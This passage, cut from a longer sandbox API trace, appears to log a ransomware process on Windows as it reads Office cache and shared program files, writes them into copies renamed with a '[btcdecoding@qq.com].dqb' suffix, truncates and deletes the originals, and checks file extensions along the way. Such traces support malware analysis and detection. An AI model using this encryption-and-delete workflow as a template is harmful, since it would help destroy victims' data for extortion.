(lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.911] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.911] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.911] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.911] lstrlenW (lpString=".doc") returned 4 [0035.911] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.911] lstrlenW (lpString=".docx") returned 5 [0035.911] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.911] lstrlenW (lpString=".pdf") returned 4 [0035.911] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.911] lstrlenW (lpString=".xls") returned 4 [0035.911] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.911] lstrlenW (lpString=".xlsx") returned 5 [0035.911] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.911] lstrlenW (lpString=".ppt") returned 4 [0035.911] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.911] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.912] lstrlenW (lpString=".zip") returned 4 [0035.912] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.912] lstrlenW (lpString=".rar") returned 4 [0035.912] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.912] lstrlenW (lpString=".bz2") returned 4 [0035.912] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.912] lstrlenW (lpString=".7z") returned 3 [0035.912] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.912] lstrlenW (lpString=".dbf") returned 4 [0035.912] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.912] lstrlenW (lpString=".1cd") returned 4 [0035.912] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.912] lstrlenW (lpString=".jpg") returned 4 [0035.912] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.912] lstrlenW (lpString=".doc") returned 4 [0035.912] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.912] lstrlenW (lpString=".docx") returned 5 [0035.912] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.912] lstrlenW (lpString=".pdf") returned 4 [0035.912] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.912] lstrlenW (lpString=".xls") returned 4 [0035.912] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.912] lstrlenW (lpString=".xlsx") returned 5 [0035.912] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.912] lstrlenW (lpString=".ppt") returned 4 [0035.912] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.912] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.912] lstrlenW (lpString=".zip") returned 4 [0035.912] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.913] lstrlenW (lpString=".rar") returned 4 [0035.913] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.913] lstrlenW (lpString=".bz2") returned 4 [0035.913] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.913] lstrlenW (lpString=".7z") returned 3 [0035.913] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.913] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.913] lstrlenW (lpString=".dbf") returned 4 [0035.913] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.913] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.913] lstrlenW (lpString=".1cd") returned 4 [0035.913] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.913] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.913] lstrlenW (lpString=".jpg") returned 4 [0035.913] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.913] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.913] lstrlenW (lpString="Setup.xml") returned 9 [0035.913] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0036.481] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=31094) returned 1 [0036.481] CloseHandle (hObject=0x190) returned 1 [0036.481] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0036.481] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.481] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0036.481] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0036.481] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0036.481] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0036.481] GetLastError () returned 0x0 [0036.481] ReadFile (in: hFile=0x190, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x7976, lpOverlapped=0x0) returned 1 [0036.483] WriteFile (in: hFile=0x1bc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x7980, lpOverlapped=0x0) returned 1 [0036.485] ReadFile (in: hFile=0x190, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0036.485] WriteFile (in: hFile=0x1bc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.485] SetEndOfFile (hFile=0x1bc) returned 1 [0036.485] CloseHandle (hObject=0x1bc) returned 1 [0036.486] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0036.486] SetEndOfFile (hFile=0x190) returned 1 [0036.487] CloseHandle (hObject=0x190) returned 1 [0036.487] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0036.487] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.487] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.487] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.487] lstrlenW (lpString=".doc") returned 4 [0036.487] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString=".docx") returned 5 [0036.488] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.488] lstrlenW (lpString=".pdf") returned 4 [0036.488] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString=".xls") returned 4 [0036.488] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString=".xlsx") returned 5 [0036.488] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.488] lstrlenW (lpString=".ppt") returned 4 [0036.488] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.488] lstrlenW (lpString=".zip") returned 4 [0036.488] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.488] lstrlenW (lpString=".rar") returned 4 [0036.488] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString=".bz2") returned 4 [0036.488] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString=".7z") returned 3 [0036.488] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.488] lstrlenW (lpString=".dbf") returned 4 [0036.488] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.488] lstrlenW (lpString=".1cd") returned 4 [0036.488] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.488] lstrlenW (lpString=".jpg") returned 4 [0036.488] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.488] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.488] lstrlenW (lpString=".doc") returned 4 [0036.488] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.488] lstrlenW (lpString=".docx") returned 5 [0036.488] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.488] lstrlenW (lpString=".pdf") returned 4 [0036.489] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.489] lstrlenW (lpString=".xls") returned 4 [0036.489] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.489] lstrlenW (lpString=".xlsx") returned 5 [0036.489] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.489] lstrlenW (lpString=".ppt") returned 4 [0036.489] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.489] lstrlenW (lpString=".zip") returned 4 [0036.489] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.489] lstrlenW (lpString=".rar") returned 4 [0036.489] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.489] lstrlenW (lpString=".bz2") returned 4 [0036.489] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.489] lstrlenW (lpString=".7z") returned 3 [0036.489] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.489] lstrlenW (lpString=".dbf") returned 4 [0036.489] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.489] lstrlenW (lpString=".1cd") returned 4 [0036.489] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.489] lstrlenW (lpString=".jpg") returned 4 [0036.489] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.489] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0036.489] lstrlenW (lpString="boxed-join.avi") returned 14 [0036.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.978] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=33280) returned 1 [0036.979] CloseHandle (hObject=0x180) returned 1 [0036.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0036.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.979] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.979] lstrlenW (lpString=".doc") returned 4 [0036.979] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.979] lstrlenW (lpString=".docx") returned 5 [0036.979] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0036.979] lstrlenW (lpString=".pdf") returned 4 [0036.979] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.979] lstrlenW (lpString=".xls") returned 4 [0036.979] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.979] lstrlenW (lpString=".xlsx") returned 5 [0036.979] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0036.979] lstrlenW (lpString=".ppt") returned 4 [0036.979] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.979] lstrlenW (lpString=".zip") returned 4 [0036.979] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.979] lstrlenW (lpString=".rar") returned 4 [0036.980] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString=".bz2") returned 4 [0036.980] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString=".7z") returned 3 [0036.980] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.980] lstrlenW (lpString=".dbf") returned 4 [0036.980] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.980] lstrlenW (lpString=".1cd") returned 4 [0036.980] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.980] lstrlenW (lpString=".jpg") returned 4 [0036.980] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.980] lstrlenW (lpString=".doc") returned 4 [0036.980] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString=".docx") returned 5 [0036.980] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0036.980] lstrlenW (lpString=".pdf") returned 4 [0036.980] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString=".xls") returned 4 [0036.980] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString=".xlsx") returned 5 [0036.980] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0036.980] lstrlenW (lpString=".ppt") returned 4 [0036.980] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.980] lstrlenW (lpString=".zip") returned 4 [0036.980] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString=".rar") returned 4 [0036.980] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.980] lstrlenW (lpString=".bz2") returned 4 [0036.980] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.981] lstrlenW (lpString=".7z") returned 3 [0036.981] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.981] lstrlenW (lpString=".dbf") returned 4 [0036.981] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.981] lstrlenW (lpString=".1cd") returned 4 [0036.981] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0036.981] lstrlenW (lpString=".jpg") returned 4 [0036.981] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.981] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0036.981] lstrlenW (lpString="join.avi") returned 8 [0036.981] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.981] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=222208) returned 1 [0036.981] CloseHandle (hObject=0x180) returned 1 [0036.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0036.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.981] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.982] lstrlenW (lpString=".doc") returned 4 [0036.982] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.982] lstrlenW (lpString=".docx") returned 5 [0036.982] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0036.982] lstrlenW (lpString=".pdf") returned 4 [0036.982] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.982] lstrlenW (lpString=".xls") returned 4 [0036.982] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.982] lstrlenW (lpString=".xlsx") returned 5 [0036.982] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0036.982] lstrlenW (lpString=".ppt") returned 4 [0036.982] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.982] lstrlenW (lpString=".zip") returned 4 [0036.982] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.982] lstrlenW (lpString=".rar") returned 4 [0036.982] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.982] lstrlenW (lpString=".bz2") returned 4 [0036.982] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.982] lstrlenW (lpString=".7z") returned 3 [0036.982] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.982] lstrlenW (lpString=".dbf") returned 4 [0036.982] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.982] lstrlenW (lpString=".1cd") returned 4 [0036.982] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.982] lstrlenW (lpString=".jpg") returned 4 [0036.982] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.983] lstrlenW (lpString=".doc") returned 4 [0036.983] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.983] lstrlenW (lpString=".docx") returned 5 [0036.983] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0036.983] lstrlenW (lpString=".pdf") returned 4 [0036.983] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.983] lstrlenW (lpString=".xls") returned 4 [0036.983] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.983] lstrlenW (lpString=".xlsx") returned 5 [0036.983] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0036.983] lstrlenW (lpString=".ppt") returned 4 [0036.983] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.983] lstrlenW (lpString=".zip") returned 4 [0036.983] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.983] lstrlenW (lpString=".rar") returned 4 [0036.983] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.983] lstrlenW (lpString=".bz2") returned 4 [0036.983] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.983] lstrlenW (lpString=".7z") returned 3 [0036.983] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.983] lstrlenW (lpString=".dbf") returned 4 [0036.983] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.983] lstrlenW (lpString=".1cd") returned 4 [0036.983] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0036.983] lstrlenW (lpString=".jpg") returned 4 [0036.983] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.983] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0036.983] lstrlenW (lpString="split.avi") returned 9 [0036.984] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.984] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=194048) returned 1 [0036.984] CloseHandle (hObject=0x180) returned 1 [0036.984] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0036.984] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 